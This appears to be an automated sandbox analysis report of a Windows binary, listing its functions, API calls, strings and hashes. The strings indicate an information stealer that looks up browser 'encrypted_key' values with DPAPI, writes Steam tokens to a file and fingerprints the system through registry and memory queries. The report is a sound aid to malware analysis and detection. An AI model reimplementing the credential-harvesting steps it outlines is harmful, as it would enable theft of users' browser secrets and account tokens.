                            • Instruction ID: 64df4ee8bb46f7d8694bdcc0b5b815f0c67667e746f687f9fc09e42edb433528
                            • Opcode Fuzzy Hash: 204528d3ae05207498a2901c2afbbf7e2ca5455f3831c87c3a709087f3112c84
                            • Instruction Fuzzy Hash: EE5181716406069FCB20DF68D888A5AB7F9EF48700F18C45AEC4ADB245EF70D9419B70
                            Function 00D82910 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00D82925
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00D8292C
                            • RegOpenKeyExA.ADVAPI32(80000002,00BEB9D8,00000000,00020119,00D828A9), ref: 00D8294B
                            • RegQueryValueExA.ADVAPI32(00D828A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00D82965
                            • RegCloseKey.ADVAPI32(00D828A9), ref: 00D8296F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: CurrentBuildNumber
                            • API String ID: 3225020163-1022791448
                            • Opcode ID: 3b222da157eb1c7fdf63c6a9218307d336680dc5b022e27eafcbed8222e98937
                            • Instruction ID: a1f21719849f4f442b59aa8ed2c4c9c8c7a449a454e7e952eded584708e7088a
                            • Opcode Fuzzy Hash: 3b222da157eb1c7fdf63c6a9218307d336680dc5b022e27eafcbed8222e98937
                            • Instruction Fuzzy Hash: 66012F75600318AFE310EBA5EC59EFB7BBCEB49745F140099FE45D7240EA7159088BA0
                            Function 00D82880 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00D82895
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00D8289C
                              • Part of subcall function 00D82910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00D82925
                              • Part of subcall function 00D82910: RtlAllocateHeap.NTDLL(00000000), ref: 00D8292C
                              • Part of subcall function 00D82910: RegOpenKeyExA.ADVAPI32(80000002,00BEB9D8,00000000,00020119,00D828A9), ref: 00D8294B
                              • Part of subcall function 00D82910: RegQueryValueExA.ADVAPI32(00D828A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00D82965
                              • Part of subcall function 00D82910: RegCloseKey.ADVAPI32(00D828A9), ref: 00D8296F
                            • RegOpenKeyExA.ADVAPI32(80000002,00BEB9D8,00000000,00020119,00D79500), ref: 00D828D1
                            • RegQueryValueExA.ADVAPI32(00D79500,00BFDDA8,00000000,00000000,00000000,000000FF), ref: 00D828EC
                            • RegCloseKey.ADVAPI32(00D79500), ref: 00D828F6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: Windows 11
                            • API String ID: 3225020163-2517555085
                            • Opcode ID: 7994869a461fa49fb01fff53702748ffc15a6c214658ec00f6f5f269c74f3cad
                            • Instruction ID: 41da6611c6f4c0ca247e937c5a4156ff8c834a1c0735a7d548eff04f49f55076
                            • Opcode Fuzzy Hash: 7994869a461fa49fb01fff53702748ffc15a6c214658ec00f6f5f269c74f3cad
                            • Instruction Fuzzy Hash: E301A27164020CBBEB10ABB9EC4AEBA777CEB44355F00015AFE08D2250DA71594597F0
                            Function 00D671F0 Relevance: 9.1, APIs: 6, Instructions: 142memorylibraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNEL32(?), ref: 00D6723E
                            • GetProcessHeap.KERNEL32(00000008,00000010), ref: 00D67279
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00D67280
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00D672C3
                            • HeapFree.KERNEL32(00000000), ref: 00D672CA
                            • GetProcAddress.KERNEL32(00000000,?), ref: 00D67329
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                            • String ID:
                            • API String ID: 174687898-0
                            • Opcode ID: 90aec6061cbc7dfe1d6688fd400d1bb168925178acc0032d84bc1bea01aed41f
                            • Instruction ID: c638e5e549e559b09fbaf589f61e72dfeb220285c41822263b8139838a2dd5ca
                            • Opcode Fuzzy Hash: 90aec6061cbc7dfe1d6688fd400d1bb168925178acc0032d84bc1bea01aed41f
                            • Instruction Fuzzy Hash: E9415F717057099BDB20CF69DC84BAAB3E8FB89319F18456AEC5DC7310E631E9509B60
                            Function 00D69C70 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 124memorystringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000), ref: 00D69CA8
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00D69CDA
                            • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00D69D03
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocLocallstrcpy
                            • String ID: $"encrypted_key":"$DPAPI
                            • API String ID: 2746078483-738592651
                            • Opcode ID: c279162533379f609f009abb0ca5cbfad7aef1dd3a19a0b5db69ee1cbb2eeb79
                            • Instruction ID: 72a08f97faa01d8d3ee8be0598d865a0554f81506f9bbccc7254fc5fee1eefed
                            • Opcode Fuzzy Hash: c279162533379f609f009abb0ca5cbfad7aef1dd3a19a0b5db69ee1cbb2eeb79
                            • Instruction Fuzzy Hash: F241C371A016099BCF21EFA8DDA16EEB7B8EF54304F0D4468E915A7252DA70ED05CBB0
                            Function 00D7E9E0 Relevance: 9.1, APIs: 6, Instructions: 110stringCOMMON
                            Download Yara Rule
                            APIs
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00D7EA24
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7EA53
                            • lstrcat.KERNEL32(?,00000000), ref: 00D7EA61
                            • lstrcat.KERNEL32(?,00D91794), ref: 00D7EA7A
                            • lstrcat.KERNEL32(?,00BF8FA0), ref: 00D7EA8D
                            • lstrcat.KERNEL32(?,00D91794), ref: 00D7EA9F
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FolderPathlstrcpy
                            • String ID:
                            • API String ID: 818526691-0
                            • Opcode ID: cc8254fbbc9ea717ec0d5366a91dc3fb52bbc855077aba20f8104059adcab76c
                            • Instruction ID: 9ca862e7b97187329637cc7ec77fe4b212c6c4ae8f4b1c478c3cb62f183bf74f
                            • Opcode Fuzzy Hash: cc8254fbbc9ea717ec0d5366a91dc3fb52bbc855077aba20f8104059adcab76c
                            • Instruction Fuzzy Hash: F941847195111DAFCB15EBA4DC42EFD7378FF88300F0444A9BA1A97251DEB09E849BB0
                            Function 00D7ECB0 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D7ECDF
                            • lstrlen.KERNEL32(00000000), ref: 00D7ECF6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7ED1D
                            • lstrlen.KERNEL32(00000000), ref: 00D7ED24
                            • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 00D7ED52
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID: steam_tokens.txt
                            • API String ID: 367037083-401951677
                            • Opcode ID: e812d83864d1c95a00304b65550baf7d07eeaaf9716c598b65dcd5dba6249fd7
                            • Instruction ID: a7d0c9a134507bef0f5953c277b93daf3281e23f312fd2a4233812010b60ae7b
                            • Opcode Fuzzy Hash: e812d83864d1c95a00304b65550baf7d07eeaaf9716c598b65dcd5dba6249fd7
                            • Instruction Fuzzy Hash: F7319131A529055BC722FBB8EC5A96E77B8EF44300F085065F80ADB212EBB0DD0687F1
                            Function 00D69A80 Relevance: 9.1, APIs: 6, Instructions: 67filememoryCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,00D6140E), ref: 00D69A9A
                            • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00D6140E), ref: 00D69AB0
                            • LocalAlloc.KERNEL32(00000040,?,?,?,?,00D6140E), ref: 00D69AC7
                            • ReadFile.KERNEL32(00000000,00000000,?,00D6140E,00000000,?,?,?,00D6140E), ref: 00D69AE0
                            • LocalFree.KERNEL32(?,?,?,?,00D6140E), ref: 00D69B00
                            • CloseHandle.KERNEL32(00000000,?,?,?,00D6140E), ref: 00D69B07
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                            • String ID:
                            • API String ID: 2311089104-0
                            • Opcode ID: f094389c36837af31b1cd1aedf68522105e5a4fff69a9e71d7a3e77b55056404
                            • Instruction ID: a77a75e14c3a35e548b29540cc5f595dc94332cf4440ff356a437e09d10a99ef
                            • Opcode Fuzzy Hash: f094389c36837af31b1cd1aedf68522105e5a4fff69a9e71d7a3e77b55056404
                            • Instruction Fuzzy Hash: 89115B71600209AFEB10DFA9ECD8ABEB3ACEB05344F14025AF91197290EB70DD50CBB0
                            Function 00D85AD0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 135COMMON
                            Download Yara Rule
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00D85B14
                              • Part of subcall function 00D8A173: std::exception::exception.LIBCMT ref: 00D8A188
                              • Part of subcall function 00D8A173: std::exception::exception.LIBCMT ref: 00D8A1AE
                            • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00D85B7C
                            • memmove.MSVCRT(00000000,?,?), ref: 00D85B89
                            • memmove.MSVCRT(00000000,?,?), ref: 00D85B98
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                            • String ID: vector<T> too long
                            • API String ID: 2052693487-3788999226
                            • Opcode ID: 51ef135b366379e243cf3042ce56e49b62707266c835ad474cd94c70b017477b
                            • Instruction ID: cdc3a116d5d122395f9010e6a8dd20edda1f7ba74cc2277ef6d8a559ee518a7d
                            • Opcode Fuzzy Hash: 51ef135b366379e243cf3042ce56e49b62707266c835ad474cd94c70b017477b
                            • Instruction Fuzzy Hash: E8417271B006199FCF08DF6CD995AAEBBF5EB98710F148229E909E7344D634ED00CBA0
                            Function 00D77D40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94COMMON
                            Download Yara Rule
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00D77D58
                              • Part of subcall function 00D8A1C0: std::exception::exception.LIBCMT ref: 00D8A1D5
                              • Part of subcall function 00D8A1C0: std::exception::exception.LIBCMT ref: 00D8A1FB
                            • std::_Xinvalid_argument.LIBCPMT ref: 00D77D76
                            • std::_Xinvalid_argument.LIBCPMT ref: 00D77D91
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_$std::exception::exception
                            • String ID: invalid string position$string too long
                            • API String ID: 3310641104-4289949731
                            • Opcode ID: 076b92c455c4dc6ea671d8901805583e8f420481e76258b6a97591f218aff751
                            • Instruction ID: a3c466a5f4ab96efb0c38a21046338f6047a2a2313fe302b256beac93557730a
                            • Opcode Fuzzy Hash: 076b92c455c4dc6ea671d8901805583e8f420481e76258b6a97591f218aff751
                            • Instruction Fuzzy Hash: B32191323043009FD7309E6CD891A3AB7E5EFA1754F248E6EE49A8B241E761D84587B5
                            Function 00D833C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D833EF
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00D833F6
                            • GlobalMemoryStatusEx.KERNEL32 ref: 00D83411
                            • wsprintfA.USER32 ref: 00D83437
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
